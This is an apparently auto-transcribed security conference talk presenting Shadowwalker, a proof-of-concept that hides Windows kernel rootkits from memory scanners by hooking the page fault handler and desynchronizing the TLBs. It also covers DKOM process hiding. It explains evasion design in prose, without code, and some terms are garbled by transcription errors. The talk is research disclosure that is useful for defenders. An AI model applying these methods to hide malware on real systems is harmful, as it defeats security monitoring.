 Just be a minute more as we get soft ice running, things like that, get our presentations done. Presentation was originally developed for an hour and 30 minutes. However, this time slot's an hour and 50. I mean, 50 minutes, and we've already filled like 7. Therefore, we may run a little bit late if we need to leave at 3. However, I will blow through the first 20 slides in about 2 minutes because we don't have time to get them in. And Sherry does the interesting slides, so I will introduce her soon. My name is Jamie Butler. I'm from Rookit.com. This is Sherry Sparks, and we developed a project called Shadowwalker, and it's to hide Rookits. You can find the description of this talk probably later on Rookit.com, so the source code I believe Sherry has composed it. Also, it will be in FRAC 63 that if it hasn't appeared on already, probably the next week or two will be there. If you don't understand much about Rookits or you are new to the Windows world of Rookits, you can go to Rookit.com. We posted it there for free. There's a lot of source code for free. Nothing there is for pay. Or you can buy the book Rookit. Rookit's supporting the Windows firmware by Greg Hogan and myself. So we'll get started with Shadowwalker. So quick, blow through Rookits. They don't propagate themselves, they're not like a virus, they're just here to provide stuff. So the attacker gets on the box and they try to maintain presence. They don't want to keep using their Zero Day to come back all the time to the machines, so they install Rookit. Rookit is there to hide their presence and also to give them future access at a later date. Rookits could also be used for all source code for things like a slaking peak or a properly executed search warrant and so forth. There's two levels of protection within the Windows and Linux operating system. There's basically two rings, ring zero, ring three. Ring three is user land processes. They are unprivileged. Ring zero is kernel land. Once you are in ring zero, your kernel Rookit can do whatever you want. Operating system provides basically an intermediary between upper level user processes and things that they want to query the operating system for. So I want to open a port. The operating system does that for you and then hands it back to the user land process. They also provide an interface between user land processes and the lower hardware. So if you have a ring zero kernel Rookit, you are just like the operating system you are a man in the middle. Some of the different OS components that a Rookit may want to attack would be the IO manager. You can install key longers. Sharing has a project on Rookit.com. That's a keyboard slipper. And you can also attack the file system. You can write your file filter driver and interface between every single access of the hard drive. The object manager has things like processes and threads that it uses to keep bookkeeping. And you can attack the object manager in order to hide your processes and threads. That's enough for that configuration manager to use at the average speed. So first generation Rookits, what were they? These were simple and trigonized replacement programs in the hard drive. They may include the Unix login program, LS, PS, so on and so forth. Second generation Rookits, they started to get more to be more sophisticated. These modified static tables within the kernel are within the upper levels of the operating system themselves. So you can replace the import address table of a PE file and alter the execution path in a command. You can also alter the system call table within the kernel. And that will zero and change what function actually gets executed within the kernel when the user requests them. Third generation Rookits, we term these, they use DECOM direct current object manipulation. These actually don't click anything because hooks are a bit easier to detect. Third generation actually manipulate the data structures in memory. So there's no code off, you don't alter the code at all, you just alter the data structures themselves. This is almost undetectable. Data structures come in very frequently and they're constantly changing, that's why they're in the data section. This is very hard to detect and we'll talk about how you can use this to hide processes and threads if you want to. Or you can even use it to hide drivers, escalate processes, privileges, use tokens, etc. So real quick, about two years ago at one of the Blackhats and all the slides are online, you can see process hiding with DECOM. Also mentioned a little bit last year when I talked about vice. What the kernel uses to keep track of all the processes is this list of active processes. Every E-process block you see there represents an individual process in the system. This individual process could be your little hacker program. It's doing things and you don't want the system administrator to know you're there. If you simply unlink, at the bottom slide you see that there's a series of links. If you simply unlink the process that you want to have hidden, it will disappear when you try to list it out. So when you run task manager, etc., it won't be there. Now per group of detection methods, there's basically four types. You don't have time to go into all of these. But just quickly, behavioral, integrity, signature-based, and difference-based. So when there's AB products, basically, example, signature-based, integrity checkers such as chip wire, check some of the disk files so that if you replace it with charging it will be found. Different-based purges is kind of a new thing. Microsoft's doing it, F-Secure's doing it. It's just internals. What this is, it does some kind of low-level scan within the kernel about following structure directly. Tries to get a list of things like files and processes, registrities, etc. Then it does an upper-level API call. If there's a difference, it knows something's up. Behavioral detection. At least you try to detect the effects of a rootkit. So you might want to look for alterations in the execution path. Or if one is actually executing a different program. So like system calls or they're ordering, etc. We don't have time to go into more of that. But everything's checking exactly. It's a CRCD. This could be on-disk or in-memory. However, hardly anyone is going to remember. Signature-based, you scan memory or on-disk. For a particular set of points that represents the mal code. So we have a really powerful way to hide rootkit or high-processes, etc. within the kernel.modify-modify status structures. However, if you look for our driver, because we are in the kernel, so we have a kernel-level driver, you can just do a simple scan, like signature scan, through the presence of the malware. And that's not very good. So what we want to do is to try to shake it up. So even if you scan memory, you can't detect all that outcome trouble. So again, if you rootkit, you want to make sure you can't detect, or rootkit can occur. So this is a problem that viruses have to face for a long time. And they use tools that probably work with little stuff around it. However, in the kernel, it gets more problematic to build a good polymorphism code. Also, no one's doing it other than Holy Father and then in his hack or tender. And you have to get here to handle that. And I think it's like 40 euros every time he does it. So really quickly, we're going to walk through how we have this in the lake and share it with people. Thank you, Jamie. I'm going to be discussing the technical implementation of Shadowwalker, which is our rootkit hiding technology. Like Jamie said, polymorphism has not really been seen a lot in rootkit so far, but it's not really an optimal approach for a rootkit. Viruses need to hide their code. Rootkits not only need to hide their code, but they also need to hide changes to operating system components. Polymorphism is not necessarily an optimal solution for that when you consider that you have the memory-based equivalents of, say, Tripwire or other types of integrity checkers. So basically, what we wanted to do is we wanted to figure out a way to hide in memory such that we actually hook the memory of the system without actually changing the code at all. And that gave rise to Shadowwalker, which we're pointing kind of as a prototype for the fourth generation in rootkit technology. Basically, the alternative to polymorphism is virtual memory subversion. Basically, what we're going to be showing you today is a proof-of-concept demonstration that a rootkit is capable of transparently controlling the view of memory seen by user applications, kernel drivers, and the operating system itself. Now, the cool thing about this technology is the fact that there's a minimal performance impact. Because we exploit some features in the hardware, that means that basically our memory hook engine hiding a rootkit is virtually undetectable. It has no slowdown or system performance hit. Obviously, this makes this type of technology attracted to not only a rootkit, but also to maybe a virus or worm or spyware applications. Just a few implications of virtual memory subversion. For a long time, rootkit scanners relied upon the integrity of the operating system API. Like Jamie mentioned, ever since the second generation rootkits, rootkits have been hooking the API, and upper-level processes can no longer trust the results returned to them by the API, either the user-level API or the kernel-level API depending upon where the rootkit is hooking. Basically, rootkit scanners have gotten a little bit smarter. They're starting to realize that they can't rely upon operating system APIs anymore. But even those rootkit scanners said don't rely upon operating system APIs, they still rely upon the integrity of the virtual memory system. Therefore, when a security scanner does a read of a certain memory address, it expects to see the data that's actually stored at that address. What we're proposing is actually to return some data that is in fact not actually stored at that address. Basically, there are two implications here. If we can control a scanner's memory read, then we can pull signature scanners and potentially make a known rootkit or virus to code immune to an in-memory signature scan. Because basically, the scanner will access the range of memory where the rootkit code is stored, and it will be returned data which is a clean copy or does not have the rootkit code. We can also pull integrity checkers, those kind of checkers like Jamie Butler presented a talk on a tool called device which basically attempts to detect hooks. Hooks typically work by replacing the beginning of the function prolog in an API with a jump instruction to a stub which is the rootkit code. So basically, under normal situations, you would not expect to see the first instruction in an API to be a jump instruction. The normal code would be such stuff as stack set of code, allocation of local variables. So basically, Jamie uses characteristics like this to determine if functions are hooked. Basically, the implications for this is that if we are subverting that particular function in memory, the scanner would perform a read and it would receive a clean copy of that API function code, yet the actual code that is executing is actually the hook code. Since we're going to be talking about this aversion of virtual memory, we're going to need to do a little bit of a review. This is stuff that's normally covered in a college-level operating systems class, but I know that for most people, we probably need to review some of this stuff. First thing we're going to talk about is virtual address space layout, and then we're going to talk about some of the concepts of virtual memory. We're going to go over the ideas of paging and segmentation, page tables and PTEs, how virtual to physical address translation actually occurs, what the page fault handler does, and then some performance issues associated with paging and how those are actually mitigated using a hardware solution or the translation look-aside buffer. Finally, we'll talk about different memory access types and some little eccentricities with the X86 architecture. So basically what you have here is a layout of the most common, the two most common layouts for the Windows virtual address space. The first one breaks the virtual address space up into two main components. Like Jamie said, we have two modes of operation under Windows. We have a privileged mode, which is basically kernel land, and we have a non-privileged mode, which is basically user land. The memory address space is arranged similarly to that. The lower two gigabytes corresponds to user land address space. That's going to contain your application code, DLL code. The upper two gigabytes is going to be where the operating system kernel is. In the upper two gigabytes, you're going to have N2S kernel, HAL hardware abstraction layer, move drivers. We're going to have key operating system structures, the process objects that Jamie was talking about, process page tables, and then non-page pool and cache memory. Alternatively, we have a second address space layout, which has been used on some of the server 2003 systems, which actually allows you to expand the user address space up to 3 gigabytes. By far the most common layout is going to be the one where it's split in half. So basically, what is the main idea behind virtual memory? Basically, the idea is we want to separate the virtual from the physical address spaces, or separate the virtual and physical address spaces. By that, what I mean is the virtual address space, the size of it, is going to be defined by the size or the width of your memory bus. So if you have a 32-bit system, that means that you have the ability to address 2 to the 32, or approximately 4 gigabytes of continuous memory locations. So therefore, your virtual address space spans from 0 up to 4 gigabytes. In contrast, most of us don't really have 4 gigabytes of RAM installed on our system unless we're really lucky. So therefore, we can say that our physical address space is constrained by the amount of RAM on our system. And the amount of RAM is most likely going to be less than the 4-gigabyte limit for the virtual address space. So basically, virtual memory concerns managing these virtual and physical address spaces by dividing them into fixed-size blocks. If those blocks are all the same size, we have a paging architecture. If those blocks may be variable sizes, it's a segmentation architecture. The x86 architecture is actually a combination of segmentation and paging. However, for the purposes of our talk, we're focusing upon the paging architecture because that's the level that we're going to subvert. As far as how this map... There's actually mapping information that actually maps a virtual block to a physical block. And the OS is what actually maintains this mapping information and determines which virtual blocks map to which physical blocks. Like I said before, the virtual address space may be larger than the physical address space. And also because the OS is managing this mapping, virtually continuous memory blocks do not need to be physically continuous. This actually shows an illustration of those two points on the previous slide. As you can see, we have our virtual address space divided up into blocks. Under a paging architecture, we call these blocks pages. The physical address space is smaller than the virtual address space. It's also divided into big-size blocks. This is termed frames. Basically, as you can see, the virtually continuous blocks do not necessarily have to be physically continuous. So what actually maintains this mapping information that the OS uses? This mapping information is contained in page tables. And page tables consist of entries called PTEs, or page table entries. Page table entries contain at least two pieces of useful information. They contain status information and they contain mapping information. The page frame number bits are the bits that actually describe where that page actually maps to in physical memory. There are also a bunch of status bits, as you can see. A few of the most important ones would be the V there for valid. That's going to determine if the page is actually resident in memory or if it's been paged out to the disk. You have the writable bit, which is going to be concerned with protection, whether or not that page is read only, or whether it's going to be writable as well. You also have some bits, the cache disabled, the dirty bit. These are bits that the OS uses in its virtual memory management for page swapping and such. And then the last bit of kind of a venture is going to be the global bit. The global bit is interesting because it determines whether or not this particular mapping information will be flushed from the hardware cache on a context switch. This actually becomes important later on. So basically, here's an illustration of the big picture just to kind of summarize all these ideas. We have our virtual address space layout divided into user space and kernel space. We have our pages, which are the divisions of the virtual address space. We have process page tables located in the kernel memory section. Process page tables contain PTEs, which contain status information and mapping information, which will basically say where those pages are located out in physical memory. So how do you go from an address to actually figuring out where that particular page is in the page table? Basically, virtual addresses encode the information necessary to index into page tables. Page tables may actually be single-level or multi-level. The x86 maintains a two-level paging architecture. Basically, we divide the virtual address into two pieces. We're going to divide it into the virtual page number, which is going to contain the page table indexing information, and we divide it into the byte index, which is going to contain an offset from the physical frame in physical memory. So basically, the virtual page number, in this case, since we have a two-level architecture, basically what that means is not only do we have a page table, we also have a page directory. And basically, the page directory is a table of pointers to page tables. And the page tables, of course, mean pointers to physical frames. This actually is used, a two-level scheme is used to actually to save memory, since the page directory is going to have to be resident. So basically, in this case, our virtual page number is actually divided into two pieces. We have to be able to figure out the index into the page directory so we can locate the correct page table, and then we have to figure out the index into the page table so we can locate the correct page frame. So basically, under x86, the upper 10 bits in the virtual address are going to provide your index into the page directory while the middle 10 bits are going to provide your index into the page table. This slide gets a little bit complicated, but I'm going to give it a go here to try to explain it. Basically, there's a number of steps involved in virtual to physical address translation. This is performed by the hardware. The first step is going to be to locate the page directory, the base address, the page directory in memory. The page directory base is actually located in the page process block. Physical address is also located in CR3, which is the control register on the processor. So basically, the first step is to locate the base of the page directory. The second step is going to be to locate the actual entry in the page directory that contains the pointer to the page table that we need. So basically, we're going to extract the upper 10 bits from the virtual address and use that to add to the page directory base to obtain the entry in the page directory table. Now, the contents of this page directory entry is basically the pointer to a page table or the base physical address of the page table in memory. So now at this point, we have the base address of the page table, and now we're trying to get to the PTE or the entry in the page table. So to get to the page table entry, now we do the same type of thing. We take the middle 10 bits of the virtual address and use that to add to the base address of the page table, and we now get the actual page table entry, which is going to contain the pointer to the page frame in physical memory. So now at this point, we have a pointer to the page frame and we're actually looking for some byte within that frame. So it's finally at this point that the actual byte index comes in and we add that to the base address of the physical frame to actually resolve the full physical address. Like we said earlier, the physical memory, maybe smaller than the amount of virtually addressable memory you have. So therefore the OS may need to move some pages from main memory out to the disk to satisfy current memory dimensions. Basically, when the OS does this, it marks the PTE for the page in question as invalid, writes it out to the disk, and the next time that page is accessed, it's going to generate a page fault. A page fault is basically just an interrupt that's going to cause a vector to an interrupt service routine, which in this case is going to be the page fault handler. There are actually several conditions where a page fault can occur. The most common condition is going to be the case where the page table entry is marked invalid and that page has been swapped out to the disk and needs to be brought in. There's a little caveat to that, because not only does the PTE need to be marked invalid, that entry cannot be present inside the TLB or the hardware cache of virtual to physical mappings. This becomes very important later on. The second situation where you can have a memory protection violation is going to be basically user mode code attempting to access kernel memory or perhaps an attempt to write to memory that's marked as read only. For all of you guys that I lost on that previous slide of virtual to physical translation, I have a little bit clearer one that shows the whole page fault path. Sorry about that. Space bar from now on. First thing, you have a memory access. The first thing we do is we need to look it up in the page directory to resolve the actual page table. In this case, it's present. We can move on and go out to the page table. In the page table, we're trying to look up actually where the physical frame is. In this case, that particular PTE has been marked invalid and the page fault is generated. This causes the page fault handler to be involved. The page fault handler now is responsible for issuing the disk IO to go out to the page file and load that frame back into main memory. Once it's loaded back into memory, it now marks the PTE as valid. Some people would say that PTE is not such a good idea. This is because there's this deep performance hit associated with paging. Basically, we take one memory reference and we turn it into three memory accesses. We're cutting our performance by a factor of three. Basically, the first thing, we have to access the page directory. That's one memory reference. We have to access the page table. There's another memory reference. Now we have to actually go out and get the bite at the correct physical address. There's our third memory reference. Actually, in the best case, every single memory access requires three memory accesses to resolve the virtual to physical address. In the worst case, not only do we need three memory accesses, now we might potentially need two disk IO's because since we have a two-level paging scheme, our page tables may be non-present and our actual page frames may be non-present as well. Therefore, you may have up to two additional disk IO's. As you can see, paging introduces a speed performance hit. Hardware designers found this to be unacceptable and they developed a solution for this to help mitigate this problem. Their solution was the translation look-aside buffer. The TLB is basically a high-speed hardware cache generally implemented in associative memory that holds the most frequently used virtual to physical mappings. Basically, the TLB caches the information held in the PTEs for certain pages that are used frequently. The TLB is actually a lot smaller than main memory which means that it's possible that an entry in the TLB could actually be evicted if another page that maps to that TLB entry needs to be loaded into the TLB. Basically, the TLB is actually first on the memory access path. It sits in front of the page table path. Therefore, on the memory access, the TLB is actually searched first before we ever even go out to the page tables. Since it is high-speed associative memory, that means that a reference found in the TLB can be resolved much, much faster than it can be resolved by even going out and doing a single memory reference in main memory. If that reference is actually found in the TLB, we say it was hit. If it was not found, we say that we had a miss. The x86 actually uses a split TLB architecture, and what I mean by that is there's actually two TLBs. There's one that holds translations for code, that's the ITLB, and there's another one that holds translations for data, that's the DTLB. I should note that modern TLBs have extremely high hit rates, which means that most translations are actually resolved via the TLB cache as opposed to actually having to go out to the page tables, which significantly increases performance. This is just a simple example of a TLB search. Basically, the TLB is a cache. It consists of two parts. You have a tag, which in this case is going to be the virtual page number, and then you have the corresponding frame that maps to that virtual page number in the data section of the cache line. Basically, when a memory reference occurs, the TLB tags are going to be searched in parallel to see if they can find a match on that virtual page number. If they can, the data or the corresponding physical frame mapping is going to be returned. In this case, we had a TLB hit on virtual page 17, and its corresponding frame is 84. Basically, here I have an illustration of the memory access path that includes a TLB. We're also going to stick with the x86 architecture, which actually has a split TLB. That means that on a memory access, code accesses are going to be checked in the ITLB. In this case, we have a hit on the ITLB. We now have the corresponding frame, which is 132, and we can go directly out to physical memory. In this case, as you can see, since we had a TLB hit, we were able to completely bypass the page tables. It may be possible that we don't have a TLB hit. We could get a miss, and what's even worse than a miss, now that we have to go out to the page tables, now we might actually get a page fault, which will kill performance even further. In this case, our memory access is a code access. It goes out to the ITLB, searches it, is not there, so now we have a miss. Now we have to go out to the page tables. In this case, we go out to the page tables, and we find something we need is not present. So we have a page fault. Now the OS page fault handler has to be invoked. It has to go out to the disk, bring that frame into memory, and finally mark that PTE as being present before the access can be completely resolved. So basically, we have three memory access types. Everyone's familiar with this. We have read, write, and execute. Unfortunately, little caveats in the x86 architecture is we actually only have two memory access types. We actually have read, execute, and read, write, execute. By that, I mean the execute access is implied to all memory. This poses a slight problem. In some cases, we might like to actually differentiate between execute access and read, write, access. One common case, one common place where this might be the case would be the implementation of non-executable memory. This is used as a buffer overflow protection scheme. Basically, you have your stack space, which is typically readable and writable. I mean, you store data on the stack, but normally the stack does not contain executing code unless a buffer overflow attack is in progress. So therefore, heuristically, if we were able to detect an execute access over a read-write access on the stack, we could say if we detect an execute, that heuristically there's a good probability that we're in progress with buffer overflow attacks. Now, the little carry-off here is, like we said, x86 doesn't let us distinguish between read, write, and execute. So basically, we have not had hardware support up to this point. We do now have some hardware support, but previously, there's a project called PAX. Basically, PAX implemented read, write, no execute or non-executable memory semantics using strictly software support. This was before there was any hardware support for non-executable memory. Windows XP Service Pack 2 and Server 2003 Service Pack 1 now also implement software support in the form of what Microsoft calls Data Execution Prevention, or DEP. As a side note, hardware support has been added for non-executable memory on the 64-bit processors, as well as the Pentium 4. Well, in the case of a root-camp, it's also kind of advantageous to be able to distinguish between executable and read, write access to a range of memory. Basically, we're going to take an offensive stance on the PAX technology, which has been around for a while. This technique's been around for a while, but so far, it hasn't really been shown how you could invert that technique for malicious purposes. Basically, we want to hide code. We want to differentiate between read, write, and execute. The idea is, if we have a read access of the code section of our root-kit driver, for example, that's going to be a very strong heuristic that a scanner is trying to locate us. Basically, what we would want to do in that case is we want our root-kit code to run, but if the scanner tries to read it, we want to basically return an image of that memory that does not contain the root-kit code or contains something clean, if it's in the case of a modification to the operating system. Basically, what we're proposing here is we're going to do an implementation that is the inverse of PAX. That is, it's an implementation of execute, allowed, but diverted read, write, memory semantics. We're going to use the PAX technique that PAX discovered to implement non-executable memory, but in this case, we're going to use it to hide a root-kit. Like I said, the technique is not totally new, but the application is somewhat new. Basically, there are three implementation issues here. First, we need a way to filter, execute, and read write accesses. Step one. Second, we need a way to fake the read write accesses once we detect them. Obviously, we don't want the scanner to receive the correct data when it reads our root-kit memory. Lastly, we need to ensure that performance is not adversely effective. Obviously, this would not be a viable solution if when we install our root-kit, the system administrator notices that his machine is suddenly running really, really slow. So to solve the first problem, basically, we said earlier that if we mark the PTE as invalid, the next memory access that occurs to that page is going to generate a page fault. So basically, that means that we can trap memory accesses by marking their page table entries as invalid and basically hooking the page fault handler and replacing the operating system's page fault handler. In the actual page fault handler, we have access to some interesting information. We have the saved instruction pointer. We also have the virtual address where the fault occurred. So therefore, if our instruction pointer equals the address of where the fault occurred, we can say that this was an execute access. Otherwise, it's going to be a read write access. There's one important thing to note here and that is the fact that our memory hook for the root-kit has to work safely with the operating system's memory management because the operating system's resolving page faults all the time. So that means in practical terms that if we're going to mark pages not present to capture memory accesses, then we also must be able to distinguish whether those memory accesses are a result of someone trying to access the hidden page or a result of normal operating system paging activity. In order to satisfy that, we actually impose two constraints. The first constraint could be that pages that are hidden are required to be a non-page memory. That means there's no possibility that the OS could page that file out to the disk. The second constraint could be if you're using pageable memory that you use an operating system API to lock it down. So once you're able to detect execute secure from read write, well, now it concerns the issue of, well, how are we actually going to fake the read write accesses? So basically this is the technique that was shown in packs that it used to implement the inverse of what we're going to talk about and that is we're going to desynchronize the hardware caches, the TLBs. Like I said, the x86 has two of them. It has one for code, which is searched on execute. It has one for data, which is searched on read write. So therefore a memory access, under normal situation, the ITLB is going to contain the virtual page number in the corresponding physical frame and the DTLB is going to contain the same thing. So in this case, for virtual page number 12, we see it maps to frame two. For the DTLB, it also maps to frame two. Under normal situations, read write and execute, they all map to the same physical frame. However, what if we could desynchronize them? What if we could have the ITLB to actually map off to a different physical frame than the DTLB? So basically the idea here is that the ITLB contains a pointer to a frame which contains the root kit code and the DTLB contains a pointer to the frame which either has a clean copy of something or some random garbage, which is not the root kit code. So basically, since all these translations are performed at the hardware level, this is going to be transparent to the application program to the kernel driver or even to the operating system. So basically, once we've decided that we're going to desynchronize the TLBs, the question is, well, how do you actually do this? TLBs are almost entirely in hardware control. However, there is a little bit of support for software control, which in this case happens to be enough support to implement this. First of all, we have the capability to flush the TLB. Basically, we can flush the entire TLB by reloading register CR3. This normally occurs on a context switch. On a context switch, typically CR3 will be reloaded, which ends up flushing the entire TLB except for global entries, which will remain in the TLB. This is mainly a performance enhancement for operating system components, which will remain resident at all times. Also, we also have a method of not only flushing the entire TLB, but of flushing an individual entry in the TLB. That would be the invalidate page instruction. So now that we've established that we can flush the TLB, how about loading it? It is possible actually to load the TLBs separately, which means that actually executing a data access loads the DTLB, but not the ITLB. Conversely, executing a call loads the ITLB, but not the DTLB. Therefore, it is possible to discreetly load the two TLBs separately and desynchronize them. Basically, our group of concept implementation consists of two main components. We have the memory hook engine, which has a hook installation component, which sets up the hook, and then a custom pagefall handler, which basically is responsible for filtering execute and read write accesses and correctly manually loading up the right TLB. Also, our second component is going to be a modified FU root kit. So basically, we've modified Jamie's root kit to work in collusion with our shadow walker. So basically, on memory hook installation, there's several steps that have to be performed. First of all, since we're going to mark pages not present, we need to install a new pagefall handler. Once we've done that, on a pagefall, we're going to need to be able to determine relatively quickly if that fall is due to one of our hidden pages being accessed or if it's due to the actual operating system performing normal paging activity. So in order to do that, we just insert that page into a simple hash table so we can perform a quick lookup. Next, we mark the page not present. And then the last step is really the most important here because we said that the TLB is first on the memory access path, which means that a pagefall is generated, one, when the PTE is marked present, but like I said earlier, two, when that entry is not present in the TLB. So therefore, we perform an explicit flush of that page that we're hiding. This means that on the next memory access, we will be able to generate a pagefall. If you could please hold your questions to end. We'll have time for questions. So basically, the custom pagefall handler's main responsibility is to filter, read, write, and execute accesses for hooked pages. If it determines that the page is not a hooked page, meaning it's just a normal operating system pagefall, it passes it down to the OS handler. If it is a pagefall due to a hidden page, it's either going to manually load the ITLB or manually load the DTLB depending upon the type of access. Most memory references will be resolved via the TLB path. So intuitively, you would think that you would be generating a lot of page faults. You would take a big hit in performance, not the case, because we're using the hardware caching mechanism, which is simply desynchronizing it. So basically, we will still have page faults. But page faults are not as many as you would think since the TLB path will handle most of the memory references. Page faults on the hooked pages will, of course, occur on the first execute or data access to the page. Remember, we had to flush it, flush the TLB when we instantiated the hook. It will occur on the TLB cache line of fiction. So it's possible that the mapping for that hooked page got evicted from the TLB. Well, the next time that a memory access occurs, it will now generate a page fault, which the page fault handler will now reload the correct mapping into the TLB, and that memory access will go through. Likewise, the last case would be on an explicit TLB flush context switch if the global bit has not been enabled. So basically here we have some really rudimentary page fault handler pseudocode for what's going on. So basically, we are only hiding kernel pages right now. So we're going to disregard user land accesses. So in the page fault handler, we want this to be as efficient as possible, so we don't want to tie things up if we're not interested in handling this fault. So the first thing we do is we just check if the processor mode is in user mode. If it is, we pass it down. We're not dealing with user mode. If the faulting address is a user page, we're also going to pass it down because we don't hook user pages. In contrast, if the fault is from a hidden page, now we're going to check if it's a read write or an execute. If it's an execute, we're going to jump over to load the ITLB. If it's a data access, we're going to jump over to the load DTLB code. Basically, in the load ITLB, what we're going to do is we're going to basically replace that physical frame information in PTE with the mapping for the actual physical frame that contains the root kit code because we want it to execute. We're going to temporarily mark that PTE as present to allow the memory access to go through. We're going to perform a call into the page which is going to load up the ITLB, and I should note here, I forgot to put this on the previous page, that we do have to perform a call. Basically, that means that we need to find an empty byte in our hidden page that we can insert a return off code to. In practice, if you're going to hide sections, say in a driver, those are PTE sections. Therefore, there's going to be some alignment. Therefore, there's normally some empty space in there. You shouldn't really have trouble finding one byte that you can just pack to return into. Therefore, basically, we just make the call to this point in the page where the return has been patched, and it returns control back to page fault handler. In process, it loads up the ITLB. Finally, the PTE is marked as non-present again, so we can catch subsequent accesses. We also replace the frame back with the original innocent looking frame. We go ahead and we return back to the faulting application, or driver if the case may be, without passing down to the OS. The OS doesn't need to have any knowledge in this PTE fault. If it's a DTLB load, basically the steps are a little bit simpler, because by default, we're going to maintain the clean mapping in the PTE. Therefore, we just mark a present, perform a read access, and then mark it non-present again. Then, of course, return without passing down to the OS. Basically, all this information so far concerns how you would hide executable code. We're running out of time, so I'm going to go ahead and skip this section on data hiding. The slide should be available probably on rootkit.com within the next week or so. Basically, I'm going to move ahead and we're just going to talk a little bit about the rootkit here. The rootkit is, of course, the object that we are implementing this process on to hide it is proof of concept. It doesn't really do anything malicious. It just hides processes. It runs as a system thread. It has no dependence upon user land initialization, which means it has no symbolic link or no functional device in the driver. Also, basically, we envision this rootkit as being an in-memory rootkit, meaning that ideally it would be installed via a kernel-level exploit. Obviously, if this rootkit driver is to be on the news, we open up a whole new can of worms for detection and basically invalidate all these selfie things that we're trying to do. Basically, we never wanted to reside on the disk. This is a perfectly reasonable thing if we consider attacking, say, a server system, which is infrequently rebooting. Chances are high that this rootkit will sit in memory and by the time we come back, it'll still be there. Lastly, the impact on system performance, like we said, modern TLDs have high hit rates. That means most translations will be resolved via the TLD and not the page fault path, which means that we're going to have a very little performance hit. I can't speak from a performance metric point of view here because we haven't really done any rigorous testing on performance, but I can say, that subjectively speaking, hiding Jamie's rootkit with this Shadowwalker memory hook engine, there is no subjective, noticeable performance impact. Clearly, the performance impact will probably vary depending upon the number of pages you're having to hide. In this case, hiding a kernel driver, how many pages you really have. You have four or five sections in a PE, portable executable, so chances are, you only have four or five pages. If they're page aligned, four or five pages is really negligible. So for small numbers of pages, we haven't observed any performance impact at all. As this is not really a weaponized attack tool, there are a number of known limitations. Jamie and I have done this basically on our spare time, so basically we've not implemented a fully productized or weaponized version. So first of all, there's no PAE support. PAE basically extends addressability from 32 to 36 bits. We don't support that yet. There's no hyperthreading or multi-processor support. There's clear issues with regards to synchronization problems involved with porting this up to a multi-processor system. We've not addressed those yet. Currently, we only hide 4K-sized kernel pages. We are theoretically capable of hiding four megabyte pages. The X86 architecture actually has two page sizes, four K and four megabyte. The main point of interest with the four megabyte pages are going to be hiding of NTUS kernel, which is sitting on a four megabyte page obviously in interest to a root kit developer who wants to install his hooks into the operating system kernel. Currently, we can't hide NTUS kernel. There's some technical difficulties with that, which we're working to resolve. But it's quite effective for hiding drivers and other drivers such as maybe Indus, which sit in the 4K page range. So we could hide things, hooks, and the network drivers, for example. As far as detection, I'm going to go over this real, real brief. I think we're really running out of time here. First of all, like we said earlier, we have to make the constraint that we have non-paged memory that we're marking non-present. So we don't conflict with the... So we can differentiate our page faults from OS page faults. Obviously, non-present pages in non-page memory are empiristically abnormal. If that's sufficient to indicate that a root kit's installed, highly debatable, but it's still abnormal. Obviously, the page fault handler code itself cannot be marked not present, because that would imply that we're marking the page containing the page fault handler as not present. We would end up with lots of recursive problems, of recursive re-entry. Therefore, the solution for hiding the page fault handler, we have to fall back to more tried-and-true approaches. It's small. In assembly, there's no APIs. So, you know, polymorphism seems like a fairly reasonable solution to that problem. Likewise, it's also difficult to conceal hooks on the IDT. Currently, this proof of concept makes no effort to conceal the IDT hooks. Yes, this root kit is very easily detected right now because of this, but that was not really our goal. We're just showing a proof of concept. So, right now, we're really running short, so I'm going to proceed to the demo and skip the last couple slides. I know we're late, so if anyone has any other engagements, feel free to head on out, but I am going to go ahead and perform the demo for anyone that's interested. I'm going to do a GUI version of this demo. I have a hardcore softice version if anyone wants to see after the talk. So, basically, the first thing I'm going to do is, right now, I'm using a driver monitor. It's a tool with a softice driver suite. It allows you to load a kernel driver. The first thing I'm going to do is I'm going to go ahead and load up Jamie's root kit at you. So, go. Our driver has started successfully. Now, if we enter softice, we can get the base address of where this driver is loaded in memory. This is the virtual address of where this driver is loaded in memory. We're going to go ahead and dump it. Dump the memory at that address. So, for all of you guys that use HexDumps all the time, this should look pretty familiar. This 4D5A, that's simply the mz signature inside the PE header. Right now, what we're seeing is the PE header of this root kit driver loaded in memory. Now, at this point, I'm going to go ahead and load up a shadow walker. So, it started up successfully. So, now we're going to go ahead and perform another memory dump. Well, now, it's gone. So, we'll take questions off line. We're leaving the room. We're being evicted. We have swag books. We'd love to hear from you. Thanks a lot.